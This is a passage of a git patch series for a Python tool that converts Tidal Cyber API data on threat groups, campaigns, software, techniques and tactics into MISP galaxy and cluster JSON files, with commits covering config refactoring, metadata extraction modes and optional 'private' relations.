+ "title": "title", + "author": "authors", + "date_accessed": "date_accessed", + "date_published": "date_published" + }, + "related": {}, + "uuid": "id", + "value": "name" + } + } +} \ No newline at end of file diff --git a/tools/tidal-api/create_campaigns.py b/tools/tidal-api/create_campaigns.py deleted file mode 100644 index 8b6123c..0000000 --- a/tools/tidal-api/create_campaigns.py +++ /dev/null @@ -1,76 +0,0 @@ -from api import TidalAPI -import json - -VERSION = 1 -GALAXY_PATH = "../../galaxies/" -CLUSTER_PATH = "../../clusters/" -GALAXY_UUID = "43a8fce6-08d3-46c2-957d-53606efe2c48" - -def create_galaxy(): - galaxy = {} - galaxy["description"] = "Tidal Campaigns Galaxy" - galaxy["name"] = "Tidal Campaigns" - galaxy["namespace"] = "tidal" - galaxy["type"] = "campaigns" - galaxy["uuid"] = GALAXY_UUID - galaxy["version"] = VERSION - return galaxy - -def create_cluster(galaxy, data): - cluster = {} - values = [] - - for campaigns in data["data"]: - value = {} - relations = [] - - value["description"] = campaigns["description"] - - # Metadata fields - source = campaigns["source"] - campaign_attack_id = campaigns["campaign_attack_id"] - first_seen = campaigns["first_seen"] - last_seen = campaigns["last_seen"] - tags = campaigns["tags"] - owner = campaigns["owner_name"] - - value["meta"] = {} - if source: - value["meta"]["source"] = source - if campaign_attack_id: - value["meta"]["campaign-attack-id"] = campaign_attack_id - if first_seen: - value["meta"]["first-seen"] = first_seen - if last_seen: - value["meta"]["last-seen"] = last_seen - if tags: - value["meta"]["tags"] = tags - if owner: - value["meta"]["owner"] = owner - - value["related"] = relations - value["uuid"] = campaigns["id"] - value["value"] = campaigns["name"] - values.append(value) - - cluster["authors"] = ["Tidal"] - cluster["category"] = "Threat campaigns" - cluster["description"] = "Tidal Campaigns" - cluster["name"] = "Tidal Campaigns" - cluster["source"] = "https://app-api.tidalcyber.com/api/v1/campaigns" - cluster["type"] = "campaigns" - cluster["uuid"] = galaxy["uuid"] - cluster["values"] = values - return cluster - -if __name__ == "__main__": - api = TidalAPI() - data = api.get_data('campaigns') - galaxy = create_galaxy() - cluster = create_cluster(galaxy, data) - - with open(GALAXY_PATH + "tidal-campaigns.json", "w") as galaxy_file: - json.dump(galaxy, galaxy_file, indent=4) - - with open(CLUSTER_PATH + "tidal-campaigns.json", "w") as cluster_file: - json.dump(cluster, cluster_file, indent=4) diff --git a/tools/tidal-api/create_groups.py b/tools/tidal-api/create_groups.py deleted file mode 100644 index 18431a6..0000000 --- a/tools/tidal-api/create_groups.py +++ /dev/null @@ -1,91 +0,0 @@ -from api import TidalAPI -import json - -VERSION = 1 -GALAXY_PATH = "../../galaxies/" -CLUSTER_PATH = "../../clusters/" -GALAXY_UUID = "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6" - -def create_galaxy(): - galaxy = {} - galaxy["description"] = "Tidal Threat Group Galaxy" - galaxy["name"] = "Tidal Threat Group" - galaxy["namespace"] = "tidal" - galaxy["type"] = "threat-group" - galaxy["uuid"] = GALAXY_UUID - galaxy["version"] = VERSION - return galaxy - - -def create_cluster(galaxy, data): - cluster = {} - values = [] - - for group in data["data"]: - value = {} - relations = [] - # TODO check for id and associated_group_id and add to relations - for entry in group["associated_groups"]: - relation = {} - relation["dest-uuid"] = entry["id"] - relation["type"] = "related-to" - relations.append(relation) - - value["description"] = group["description"] - - # Metadata fields - source = group["source"] - group_attack_id = group["group_attack_id"] - country = [country["country_name"] for country in group["country"]] - observed_country = [country["country_code"] for country in group["observed_country"]] - motive = [motive["name"] for motive in group["observed_motivation"]] - target_category = [sector["name"] for sector in group["observed_sector"]] - tags = group["tags"] - owner = group["owner_name"] - - value["meta"] = {} - if source: - value["meta"]["source"] = source - if group_attack_id: - value["meta"]["group-attack-id"] = group_attack_id - if country: - value["meta"]["country"] = country - if observed_country: - value["meta"]["observed_country"] = observed_country - if motive: - value["meta"]["motive"] = motive - if target_category: - value["meta"]["target-category"] = target_category - if tags: - value["meta"]["tags"] = tags - if owner: - value["meta"]["owner"] = owner - - value["related"] = relations - value["uuid"] = group["id"] - value["value"] = group["name"] - values.append(value) - - cluster["authors"] = ["Tidal"] - cluster["category"] = "Threat Group" - cluster["description"] = "Tidal Threat Groups" - cluster["name"] = "Tidal Threat Group" - cluster["source"] = "https://app-api.tidalcyber.com/api/v1/groups" - cluster["type"] = "threat-group" - cluster["uuid"] = galaxy["uuid"] - cluster["values"] = values - return cluster - - -if __name__ == "__main__": - - api = TidalAPI() - data = api.get_data("groups") - galaxy = create_galaxy() - cluster = create_cluster(galaxy, data) - - with open(GALAXY_PATH + "tidal-threat-groups.json", "w") as galaxy_file: - json.dump(galaxy, galaxy_file, indent=4) - - with open(CLUSTER_PATH + "tidal-threat-groups.json", "w") as cluster_file: - json.dump(cluster, cluster_file, indent=4) \ No newline at end of file diff --git a/tools/tidal-api/create_software.py b/tools/tidal-api/create_software.py deleted file mode 100644 index 27ff409..0000000 --- a/tools/tidal-api/create_software.py +++ /dev/null @@ -1,106 +0,0 @@ -from api import TidalAPI -import json -import re - -VERSION = 1 -GALAXY_PATH = "../../galaxies/" -CLUSTER_PATH = "../../clusters/" -GALAXY_UUID = "38d62d8b-4c49-489a-9bc4-8e294c4f04f7" - -def create_galaxy(): - galaxy = {} - galaxy["description"] = "Tidal Software Galaxy" - galaxy["name"] = "Tidal Software" - galaxy["namespace"] = "tidal" - galaxy["type"] = "software" - galaxy["uuid"] = GALAXY_UUID - galaxy["version"] = VERSION - return galaxy - -def create_cluster(galaxy, data): - cluster = {} - values = [] - - for software in data["data"]: - value = {} - relations = [] - # TODO check for relations etc. - for entry in software["groups"]: - relation = {} - relation["dest-uuid"] = entry["id"] - relation["type"] = "used-by" - relations.append(relation) - for entry in software["associated_software"]: - relation = {} - relation["dest-uuid"] = entry["id"] - relation["type"] = "related-to" - relations.append(relation) - - value["description"] = software["description"] - - # Metadata fields - links = extract_links(software["description"]) - source = software["source"] - type = software["type"] - software_attack_id = software["software_attack_id"] - platforms = software["platforms"] - tags = software["tags"] - owner = software["owner_name"] - - value["meta"] = {} - if links: - value["meta"]["refs"] = list(links) - if source: - value["meta"]["source"] = source - if type: - value["meta"]["type"] = type - if software_attack_id: - value["meta"]["software-attack-id"] = software_attack_id - if platforms: - value["meta"]["platforms"] = platforms - if tags: - value["meta"]["tags"] = tags - if owner: - value["meta"]["owner"] = owner - - value["related"] = relations - value["uuid"] = software["id"] - value["value"] = software["name"] - values.append(value) - - cluster["authors"] = ["Tidal"] - cluster["category"] = "Threat software" - cluster["description"] = "Tidal Threat Groups" - cluster["name"] = "Tidal Threat software" - cluster["source"] = "https://app-api.tidalcyber.com/api/v1/software" - cluster["type"] = "threat-software" - cluster["uuid"] = galaxy["uuid"] - cluster["values"] = values - return cluster - -def extract_links(text): - # extract markdown links and return text without links and the links - # urls = re.findall(r'https?://[^\s\)]+', text) - regular_links = re.findall(r'\[([^\]]+)\]\((https?://[^\s\)]+)\)', text) - # sup_links = re.findall(r'\[\[([^\]]+)\]\((https?://[^\s\)]+)\)\]', text) - - # Extracting URLs from the tuples - regular_links_urls = set([url for text, url in regular_links]) - # sup_links_urls = [url for text, url in sup_links] - - # text_without_links = re.sub(r'\[([^\]]+)\]\(https?://[^\s\)]+\)', r'\1', text) - # text_without_sup = re.sub(r'.*<\/sup>', '', text_without_links) - - return regular_links_urls - -if __name__ == "__main__": - api = TidalAPI() - data = api.get_data('software') - galaxy = create_galaxy() - cluster = create_cluster(galaxy, data) - - with open(GALAXY_PATH + "tidal-software.json", "w") as galaxy_file: - json.dump(galaxy, galaxy_file, indent=4) - - with open(CLUSTER_PATH + "tidal-software.json", "w") as cluster_file: - json.dump(cluster, cluster_file, indent=4) \ No newline at end of file diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index 8bf9691..008f171 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -2,135 +2,18 @@ from api.api import TidalAPI from models.galaxy import Galaxy from models.cluster import Cluster from utils.extractor import extract_links +from utils.config import load_config import argparse CLUSTER_PATH = "../../clusters/" GALAXY_PATH = "../../galaxies/" -UUIDS = { - "software": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", - "groups": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", - "campaigns": "43a8fce6-08d3-46c2-957d-53606efe2c48", -} +config = load_config('./config.json') -GALAXY_CONFIGS = { - "software": { - "name": "Tidal Software", - "namespace": "tidal", - "description": "Tidal Software Galaxy", - "type": "software", - "uuid": UUIDS["software"], - }, - "groups": { - "name": "Tidal Groups", - "namespace": "tidal", - "description": "Tidal Groups Galaxy", - "type": "groups", - "uuid": UUIDS["groups"], - }, - "campaigns": { - "name": "Tidal Campaigns", - "namespace": "tidal", - "description": "Tidal Campaigns Galaxy", - "type": "campaigns", - "uuid": UUIDS["campaigns"], - } -} - -CLUSTER_CONFIGS = { - "software": { - "authors": "Tidal", - "category": "Software", - "description": "Tidal Software Cluster", - "name": "Tidal Software", - "source": "Tidal", - "type": "software", - "uuid": UUIDS["software"], - "values": [] - }, - "groups": { - "authors": "Tidal", - "category": "Threat Groups", - "description": "Tidal Threat Groups Cluster", - "name": "Tidal Threat Groups", - "source": "Tidal", - "type": "groups", - "uuid": UUIDS["groups"], - "values": [] - }, - "campaigns": { - "authors": "Tidal", - "category": "Campaigns", - "description": "Tidal Campaigns Cluster", - "name": "Tidal Campaigns", - "source": "Tidal", - "type": "campaigns", - "uuid": UUIDS["campaigns"], - "values": [] - } -} - -VALUE_FIELDS = { - "software": { - "description": "description", - "meta": { - "source": "source", - "type": "type", - "software-attack-id": "software_attack_id", - "platforms": "platforms", - "tags": "tags", - "owner": "owner_name" - }, - "related": { - "groups": { - "dest-uuid": "group_id", - "type": "used-by" - }, - "associated_software": { - "dest-uuid": "id", - "type": "related-to" - } - }, - "uuid": "id", - "value": "name" - }, - "groups": { - "description": "description", - "meta": { - "source": "source", - "group-attack-id": "group_attack_id", - "country": {"extract": "single", "key": "country", "subkey": "country_code"}, - "observed_country": {"extract": "multiple", "key": "observed_country", "subkey": "country_code"}, - "observed_motivation": {"extract": "multiple", "key": "observed_motivation", "subkey": "name"}, - "target-category": {"extract": "multiple", "key": "observed_sector", "subkey": "name"}, - "tags": "tags", - "owner": "owner_name" - }, - "related": { - "associated_groups": { - "dest-uuid": "id", - "type": "related-to" - } - }, - "uuid": "id", - "value": "name" - }, - "campaigns": { - "description": "description", - "meta": { - "source": "source", - "campaign-attack-id": "campaign_attack_id", - "first_seen": "first_seen", - "last_seen": "last_seen", - "tags": "tags", - "owner": "owner_name" - }, - "related": {}, - "uuid": "id", - "value": "name" - } - -} +UUIDS = config['UUIDS'] +GALAXY_CONFIGS = config['GALAXY_CONFIGS'] +CLUSTER_CONFIGS = config['CLUSTER_CONFIGS'] +VALUE_FIELDS = config['VALUE_FIELDS'] def create_cluster_values(data, cluster): value_fields = VALUE_FIELDS[cluster.internal_type] @@ -162,6 +45,8 @@ def create_metadata(data, format): metadata[meta_key] = data.get(meta_value["key"])[0].get(meta_value["subkey"]) elif meta_value.get("extract") == "multiple" and data.get(meta_value["key"]): metadata[meta_key] = [entry.get(meta_value["subkey"]) for entry in data.get(meta_value["key"])] + elif meta_value.get("extract") == "reverse" and data.get(meta_value["key"]): + metadata[meta_key] = [data.get(meta_value["key"])] elif data.get(meta_value): metadata[meta_key] = data.get(meta_value) return metadata @@ -191,7 +76,7 @@ def create_galaxy_and_cluster(galaxy_type, version): create_cluster_values(data, cluster) cluster.save_to_file(f"{CLUSTER_PATH}/tidal-{galaxy_type}.json") - print(f"Galaxy {galaxy_type} created") + print(f"Galaxy tidal-{galaxy_type} created") def create_galaxy(args): if args.all: diff --git a/tools/tidal-api/utils/config.py b/tools/tidal-api/utils/config.py new file mode 100644 index 0000000..d69e997 --- /dev/null +++ b/tools/tidal-api/utils/config.py @@ -0,0 +1,14 @@ +import json + +def load_config(file_path): + with open(file_path, 'r') as file: + config = json.load(file) + return link_uuids(config) + +def link_uuids(config): + uuids = config["UUIDS"] + for key, galaxy_config in config["GALAXY_CONFIGS"].items(): + galaxy_config["uuid"] = uuids[key] + for key, cluster_config in config["CLUSTER_CONFIGS"].items(): + cluster_config["uuid"] = uuids[key] + return config \ No newline at end of file From 9d2dfba0b996c843ff8edb98507f957f94efc00f Mon Sep 17 00:00:00 2001 From: niclas Date: Thu, 22 Feb 2024 10:52:23 +0100 Subject: [PATCH 05/49] Fix [config] metadata mapping --- tools/tidal-api/README.md | 8 ++--- tools/tidal-api/config.json | 24 ++++++++++++--- tools/tidal-api/main.py | 60 ++++++++++++++++++++++++++----------- 3 files changed, 66 insertions(+), 26 deletions(-) diff --git a/tools/tidal-api/README.md b/tools/tidal-api/README.md index 8e8b992..e0412d8 100644 --- a/tools/tidal-api/README.md +++ b/tools/tidal-api/README.md @@ -45,9 +45,9 @@ The configuration file is located in `config.json` and maps the fields of the Ti The extraction configuration is a dictionary that maps the fields of the Tidal Cyber API to the fields of the MISP galaxy. It can be used to extract data stored in a array or object in the API response. The extraction configuration looks like this: ```json { - "extract": , - "key": , - "subkey": + "extract": "", + "key": "", + "subkey": "" } ``` **Extract modes**: @@ -64,4 +64,4 @@ To build all galaxies and clusters, run the following command: ```bash python3 main.py create-galaxy -v --all -``` \ No newline at end of file +``` diff --git a/tools/tidal-api/config.json b/tools/tidal-api/config.json index dd50dbe..9d2010b 100644 --- a/tools/tidal-api/config.json +++ b/tools/tidal-api/config.json @@ -120,8 +120,16 @@ "source": "source", "type": "type", "software-attack-id": "software_attack_id", - "platforms": "platforms", - "tags": "tags", + "platforms": { + "extract": "multiple", + "key": "platforms", + "subkey": "name" + }, + "tags": { + "extract": "multiple", + "key": "tags", + "subkey": "tag" + }, "owner": "owner_name" }, "related": { @@ -192,8 +200,16 @@ "description": "description", "meta": { "source": "source", - "platforms": "platforms", - "tags": "tags", + "platforms": { + "extract": "multiple", + "key": "platforms", + "subkey": "name" + }, + "tags": { + "extract": "multiple", + "key": "tags", + "subkey": "tag" + }, "owner": "owner_name" }, "related": { diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index 008f171..98b29d7 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -8,12 +8,13 @@ import argparse CLUSTER_PATH = "../../clusters/" GALAXY_PATH = "../../galaxies/" -config = load_config('./config.json') +config = load_config("./config.json") + +UUIDS = config["UUIDS"] +GALAXY_CONFIGS = config["GALAXY_CONFIGS"] +CLUSTER_CONFIGS = config["CLUSTER_CONFIGS"] +VALUE_FIELDS = config["VALUE_FIELDS"] -UUIDS = config['UUIDS'] -GALAXY_CONFIGS = config['GALAXY_CONFIGS'] -CLUSTER_CONFIGS = config['CLUSTER_CONFIGS'] -VALUE_FIELDS = config['VALUE_FIELDS'] def create_cluster_values(data, cluster): value_fields = VALUE_FIELDS[cluster.internal_type] @@ -34,23 +35,33 @@ def create_cluster_values(data, cluster): case "value": values[key] = entry.get(value) case _: - print(f"Error: Invalid configuration for {key} in {cluster.internal_type} value fields.") + print( + f"Error: Invalid configuration for {key} in {cluster.internal_type} value fields." + ) cluster.add_value(values) + def create_metadata(data, format): metadata = {} for meta_key, meta_value in format.items(): if isinstance(meta_value, dict): if meta_value.get("extract") == "single" and data.get(meta_value["key"]): - metadata[meta_key] = data.get(meta_value["key"])[0].get(meta_value["subkey"]) - elif meta_value.get("extract") == "multiple" and data.get(meta_value["key"]): - metadata[meta_key] = [entry.get(meta_value["subkey"]) for entry in data.get(meta_value["key"])] + metadata[meta_key] = data.get(meta_value["key"])[0].get( + meta_value["subkey"] + ) + elif meta_value.get("extract") == "multiple" and data.get( + meta_value["key"] + ): + metadata[meta_key] = [ + entry.get(meta_value["subkey"]) + for entry in data.get(meta_value["key"]) + ] elif meta_value.get("extract") == "reverse" and data.get(meta_value["key"]): metadata[meta_key] = [data.get(meta_value["key"])] elif data.get(meta_value): metadata[meta_key] = data.get(meta_value) return metadata - + def create_relations(data, format): relations = [] @@ -64,7 +75,7 @@ def create_relations(data, format): relation_entry[relation_key] = relation_value relations.append(relation_entry) return relations - + def create_galaxy_and_cluster(galaxy_type, version): api = TidalAPI() @@ -78,6 +89,7 @@ def create_galaxy_and_cluster(galaxy_type, version): print(f"Galaxy tidal-{galaxy_type} created") + def create_galaxy(args): if args.all: for galaxy_type in GALAXY_CONFIGS: @@ -85,19 +97,31 @@ def create_galaxy(args): else: create_galaxy_and_cluster(args.type, args.version) + if __name__ == "__main__": - parser = argparse.ArgumentParser(description="Create a galaxy and cluster for Tidal API") + parser = argparse.ArgumentParser( + description="Create a galaxy and cluster for Tidal API" + ) subparsers = parser.add_subparsers(dest="command") - galaxy_parser = subparsers.add_parser("create_galaxy", help="Create a galaxy from the Tidal API") - galaxy_parser.add_argument("--type", choices=list(GALAXY_CONFIGS.keys()) + ['all'], help="The type of the galaxy") - galaxy_parser.add_argument("-v", "--version", type=int, required=True, help="The version of the galaxy") - galaxy_parser.add_argument("--all", action="store_true", help="Flag to create all predefined galaxy types") + galaxy_parser = subparsers.add_parser( + "create_galaxy", help="Create a galaxy from the Tidal API" + ) + galaxy_parser.add_argument( + "--type", + choices=list(GALAXY_CONFIGS.keys()) + ["all"], + help="The type of the galaxy", + ) + galaxy_parser.add_argument( + "-v", "--version", type=int, required=True, help="The version of the galaxy" + ) + galaxy_parser.add_argument( + "--all", action="store_true", help="Flag to create all predefined galaxy types" + ) galaxy_parser.set_defaults(func=create_galaxy) args = parser.parse_args() - if hasattr(args, 'func'): + if hasattr(args, "func"): args.func(args) else: parser.print_help() - From 9467e101bf95d058385b1f5a0ed385957756811e Mon Sep 17 00:00:00 2001 From: niclas Date: Thu, 22 Feb 2024 12:12:31 +0100 Subject: [PATCH 06/49] Add [config] optional "private" relations --- tools/tidal-api/README.md | 19 ++++++++++++++++++- tools/tidal-api/config.json | 6 ++++++ tools/tidal-api/main.py | 21 ++++++++++++++------- 3 files changed, 38 insertions(+), 8 deletions(-) diff --git a/tools/tidal-api/README.md b/tools/tidal-api/README.md index e0412d8..3a34cd0 100644 --- a/tools/tidal-api/README.md +++ b/tools/tidal-api/README.md @@ -42,7 +42,7 @@ The configuration file is located in `config.json` and maps the fields of the Ti >Note: The fields `meta` can be formatted as the format of the data the API provides sometimes does not match the format defined by the [MISP galaxy format](https://www.misp-standard.org/rfc/misp-standard-galaxy-format.html#name-conventions-and-terminology). You can configure this using an extraction configuration. ### Extraction Configuration -The extraction configuration is a dictionary that maps the fields of the Tidal Cyber API to the fields of the MISP galaxy. It can be used to extract data stored in a array or object in the API response. The extraction configuration looks like this: +The extraction configuration is a dictionary that maps the fields of the Tidal Cyber API to the fields of the MISP galaxy. It can be used to extract data stored in an object in the API response. The extraction configuration looks like this: ```json { "extract": "", @@ -56,6 +56,23 @@ The extraction configuration is a dictionary that maps the fields of the Tidal C - `multiple`: Extracts multiple values from the API response - `reverse`: Gets the value of the key and writes it into an array (no subkey needed) +### "Private" Relations +The Tidal Cyber API provides relations between different objects. Some of these relations point to objects that are not part of the galaxies created based on the API response nor are they part of the MISP galaxy. These relations can be marked as `private` in the config file. For example: +```json + "related": { + "tactic": { + "mode": "public", + "dest-uuid": "tactic_id", + "type": "uses" + }, + "sub_technique": { + "mode": "private", + "dest-uuid": "id", + "type": "sub-technique-of" + } + }, +``` + ## Usage ```bash python3 main.py create-galaxy -v --type diff --git a/tools/tidal-api/config.json b/tools/tidal-api/config.json index 9d2010b..2aaf32b 100644 --- a/tools/tidal-api/config.json +++ b/tools/tidal-api/config.json @@ -134,10 +134,12 @@ }, "related": { "groups": { + "mode": "private", "dest-uuid": "group_id", "type": "used-by" }, "associated_software": { + "mode": "private", "dest-uuid": "id", "type": "related-to" } @@ -175,6 +177,7 @@ }, "related": { "associated_groups": { + "mode": "private", "dest-uuid": "id", "type": "related-to" } @@ -214,10 +217,12 @@ }, "related": { "tactic": { + "mode": "public", "dest-uuid": "tactic_id", "type": "uses" }, "sub_technique": { + "mode": "private", "dest-uuid": "id", "type": "sub-technique-of" } @@ -236,6 +241,7 @@ }, "related": { "techniques": { + "mode": "public", "dest-uuid": "technique_id", "type": "uses" } diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index 98b29d7..f2e248f 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -16,7 +16,7 @@ CLUSTER_CONFIGS = config["CLUSTER_CONFIGS"] VALUE_FIELDS = config["VALUE_FIELDS"] -def create_cluster_values(data, cluster): +def create_cluster_values(data, cluster, add_private): value_fields = VALUE_FIELDS[cluster.internal_type] for entry in data["data"]: values = {} @@ -28,7 +28,7 @@ def create_cluster_values(data, cluster): metadata = create_metadata(entry, value) values["meta"] = metadata case "related": - relations = create_relations(entry, value) + relations = create_relations(entry, value, add_private) values["related"] = relations case "uuid": values[key] = entry.get(value) @@ -63,13 +63,17 @@ def create_metadata(data, format): return metadata -def create_relations(data, format): +def create_relations(data, format, add_private): relations = [] for i in range(len(list(format))): for relation in data[list(format)[i]]: + if not add_private and list(format.values())[i].get("mode") == "private": + continue relation_entry = {} for relation_key, relation_value in list(format.values())[i].items(): if relation_key != "type": + if relation_key == "mode": + continue relation_entry[relation_key] = relation.get(relation_value) else: relation_entry[relation_key] = relation_value @@ -77,14 +81,14 @@ def create_relations(data, format): return relations -def create_galaxy_and_cluster(galaxy_type, version): +def create_galaxy_and_cluster(galaxy_type, version, add_private=False): api = TidalAPI() galaxy = Galaxy(**GALAXY_CONFIGS[galaxy_type], version=version) galaxy.save_to_file(f"{GALAXY_PATH}/tidal-{galaxy_type}.json") cluster = Cluster(**CLUSTER_CONFIGS[galaxy_type], internal_type=galaxy_type) data = api.get_data(galaxy_type) - create_cluster_values(data, cluster) + create_cluster_values(data, cluster, add_private) cluster.save_to_file(f"{CLUSTER_PATH}/tidal-{galaxy_type}.json") print(f"Galaxy tidal-{galaxy_type} created") @@ -93,9 +97,9 @@ def create_galaxy_and_cluster(galaxy_type, version): def create_galaxy(args): if args.all: for galaxy_type in GALAXY_CONFIGS: - create_galaxy_and_cluster(galaxy_type, args.version) + create_galaxy_and_cluster(galaxy_type, args.version, args.addprivate) else: - create_galaxy_and_cluster(args.type, args.version) + create_galaxy_and_cluster(args.type, args.version, args.addprivate) if __name__ == "__main__": @@ -118,6 +122,9 @@ if __name__ == "__main__": galaxy_parser.add_argument( "--all", action="store_true", help="Flag to create all predefined galaxy types" ) + galaxy_parser.add_argument( + "--addprivate", action="store_true", help="Flag to add private relations" + ) galaxy_parser.set_defaults(func=create_galaxy) args = parser.parse_args() From 35b8192208093ea5827d440a50ae6c7a5c736955 Mon Sep 17 00:00:00 2001 From: niclas Date: Fri, 23 Feb 2024 11:14:00 +0100 Subject: [PATCH 07/49] refactor [tool] code --- tools/tidal-api/README.md | 84 -------- tools/tidal-api/config.json | 271 ------------------------ tools/tidal-api/config/campaigns.json | 17 ++ tools/tidal-api/config/groups.json | 17 ++ tools/tidal-api/config/references.json | 17 ++ tools/tidal-api/config/software.json | 17 ++ tools/tidal-api/config/tactic.json | 17 ++ tools/tidal-api/config/technique.json | 17 ++ tools/tidal-api/main.py | 179 ++++++---------- tools/tidal-api/models/cluster.py | 273 ++++++++++++++++++++++++- tools/tidal-api/models/galaxy.py | 19 +- tools/tidal-api/utils/__init__.py | 0 tools/tidal-api/utils/config.py | 14 -- tools/tidal-api/utils/extractor.py | 6 - 14 files changed, 444 insertions(+), 504 deletions(-) delete mode 100644 tools/tidal-api/README.md delete mode 100644 tools/tidal-api/config.json create mode 100644 tools/tidal-api/config/campaigns.json create mode 100644 tools/tidal-api/config/groups.json create mode 100644 tools/tidal-api/config/references.json create mode 100644 tools/tidal-api/config/software.json create mode 100644 tools/tidal-api/config/tactic.json create mode 100644 tools/tidal-api/config/technique.json delete mode 100644 tools/tidal-api/utils/__init__.py delete mode 100644 tools/tidal-api/utils/config.py delete mode 100644 tools/tidal-api/utils/extractor.py diff --git a/tools/tidal-api/README.md b/tools/tidal-api/README.md deleted file mode 100644 index 3a34cd0..0000000 --- a/tools/tidal-api/README.md +++ /dev/null @@ -1,84 +0,0 @@ -# Tidal Cyber API - -This is a tool generating MISP galaxies and clusters from Tidal Cyber API. - -## Endpoints -https://app-api.tidalcyber.com/api/v1/technique - -https://app-api.tidalcyber.com/api/v1/references - -https://app-api.tidalcyber.com/api/v1/tactic - -https://app-api.tidalcyber.com/api/v1/campaigns/ - -https://app-api.tidalcyber.com/api/v1/software/ - -https://app-api.tidalcyber.com/api/v1/groups/ - -## Configuration -The configuration file is located in `config.json` and maps the fields of the Tidal API to the Galaxy and Cluster fields. It consists of the following sections: -- `UUID`: The UUID of the galaxy to be created -- `GALAXY_CONFIGS`: The configuration of the galaxies to be created in the `galaxies` folder of the MISP-galaxy repository - - `name`: The name of the galaxy - - `namespace`: The namespace of the galaxy - - `description`: The description of the galaxy - - `type`: The type of the galaxy - - `uuid`: The UUID of the galaxy (will be inserted from the `UUID` section) -- `CLUSTER_CONFIGS`: The configuration of the clusters to be created in the `clusters` folder of the MISP-galaxy repository - - `authors`: The authors of the cluster - - `category`: The category of the cluster - - `description`: The description of the cluster - - `name`: The name of the cluster - - `source`: The source of the cluster - - `type`: The type of the cluster - - `uuid`: The UUID of the cluster (will be inserted from the `UUID` section) - - `values`: The values of the cluster (will be inserted from the `VALUE_FIELDS` section) -- `VALUE_FIELDS`: Defines the mapping of the fields in the Tidal Cyber API to the fields in the MISP cluster values array - - `description`: The description of the cluster value - - `meta`: The metadata of the cluster value - - `related`: The related cluster values of the cluster value (you can define a `type` for each relation type in the config which will not be mapped to a field of the API) - - `uuid`: The UUID of the cluster value - - `value`: The value of the cluster value - >Note: The fields `meta` can be formatted as the format of the data the API provides sometimes does not match the format defined by the [MISP galaxy format](https://www.misp-standard.org/rfc/misp-standard-galaxy-format.html#name-conventions-and-terminology). You can configure this using an extraction configuration. - -### Extraction Configuration -The extraction configuration is a dictionary that maps the fields of the Tidal Cyber API to the fields of the MISP galaxy. It can be used to extract data stored in an object in the API response. The extraction configuration looks like this: -```json -{ - "extract": "", - "key": "", - "subkey": "" -} -``` -**Extract modes**: - -- `single`: Extracts a single value from the API response -- `multiple`: Extracts multiple values from the API response -- `reverse`: Gets the value of the key and writes it into an array (no subkey needed) - -### "Private" Relations -The Tidal Cyber API provides relations between different objects. Some of these relations point to objects that are not part of the galaxies created based on the API response nor are they part of the MISP galaxy. These relations can be marked as `private` in the config file. For example: -```json - "related": { - "tactic": { - "mode": "public", - "dest-uuid": "tactic_id", - "type": "uses" - }, - "sub_technique": { - "mode": "private", - "dest-uuid": "id", - "type": "sub-technique-of" - } - }, -``` - -## Usage -```bash -python3 main.py create-galaxy -v --type -``` -To build all galaxies and clusters, run the following command: - -```bash -python3 main.py create-galaxy -v --all -``` diff --git a/tools/tidal-api/config.json b/tools/tidal-api/config.json deleted file mode 100644 index 2aaf32b..0000000 --- a/tools/tidal-api/config.json +++ /dev/null @@ -1,271 +0,0 @@ -{ - "UUIDS": { - "software": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", - "groups": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", - "campaigns": "43a8fce6-08d3-46c2-957d-53606efe2c48", - "technique": "3e28b683-8159-4398-8729-7248eac9aa45", - "tactic": "16a396e2-a4a9-4dfd-be0a-6ba75fb5382c", - "references": "cf5e180f-26e9-42b2-b10c-c9e55f448750" - }, - "GALAXY_CONFIGS": { - "software": { - "name": "Tidal Software", - "namespace": "tidal", - "description": "Tidal Software Galaxy", - "type": "software", - "uuid": "" - }, - "groups": { - "name": "Tidal Groups", - "namespace": "tidal", - "description": "Tidal Groups Galaxy", - "type": "groups", - "uuid": "" - }, - "campaigns": { - "name": "Tidal Campaigns", - "namespace": "tidal", - "description": "Tidal Campaigns Galaxy", - "type": "campaigns", - "uuid": "" - }, - "technique": { - "name": "Tidal Technique", - "namespace": "tidal", - "description": "Tidal Technique Galaxy", - "type": "technique", - "uuid": "" - }, - "tactic": { - "name": "Tidal Tactic", - "namespace": "tidal", - "description": "Tidal Tactic Galaxy", - "type": "tactics", - "uuid": "" - }, - "references": { - "name": "Tidal References", - "namespace": "tidal", - "description": "Tidal References Galaxy", - "type": "references", - "uuid": "" - } - }, - "CLUSTER_CONFIGS": { - "software": { - "authors": "Tidal", - "category": "Software", - "description": "Tidal Software Cluster", - "name": "Tidal Software", - "source": "Tidal", - "type": "software", - "uuid": "", - "values": [] - }, - "groups": { - "authors": "Tidal", - "category": "Threat Groups", - "description": "Tidal Threat Groups Cluster", - "name": "Tidal Threat Groups", - "source": "Tidal", - "type": "groups", - "uuid": "", - "values": [] - }, - "campaigns": { - "authors": "Tidal", - "category": "Campaigns", - "description": "Tidal Campaigns Cluster", - "name": "Tidal Campaigns", - "source": "Tidal", - "type": "campaigns", - "uuid": "", - "values": [] - }, - "technique": { - "authors": "Tidal", - "category": "Techniques", - "description": "Tidal Techniques Cluster", - "name": "Tidal Techniques", - "source": "Tidal", - "type": "technique", - "uuid": "", - "values": [] - }, - "tactic": { - "authors": "Tidal", - "category": "Tactics", - "description": "Tidal Tactics Cluster", - "name": "Tidal Tactics", - "source": "Tidal", - "type": "tactic", - "uuid": "", - "values": [] - }, - "references": { - "authors": "Tidal", - "category": "References", - "description": "Tidal References Cluster", - "name": "Tidal References", - "source": "Tidal", - "type": "references", - "uuid": "", - "values": [] - } - }, - "VALUE_FIELDS": { - "software": { - "description": "description", - "meta": { - "source": "source", - "type": "type", - "software-attack-id": "software_attack_id", - "platforms": { - "extract": "multiple", - "key": "platforms", - "subkey": "name" - }, - "tags": { - "extract": "multiple", - "key": "tags", - "subkey": "tag" - }, - "owner": "owner_name" - }, - "related": { - "groups": { - "mode": "private", - "dest-uuid": 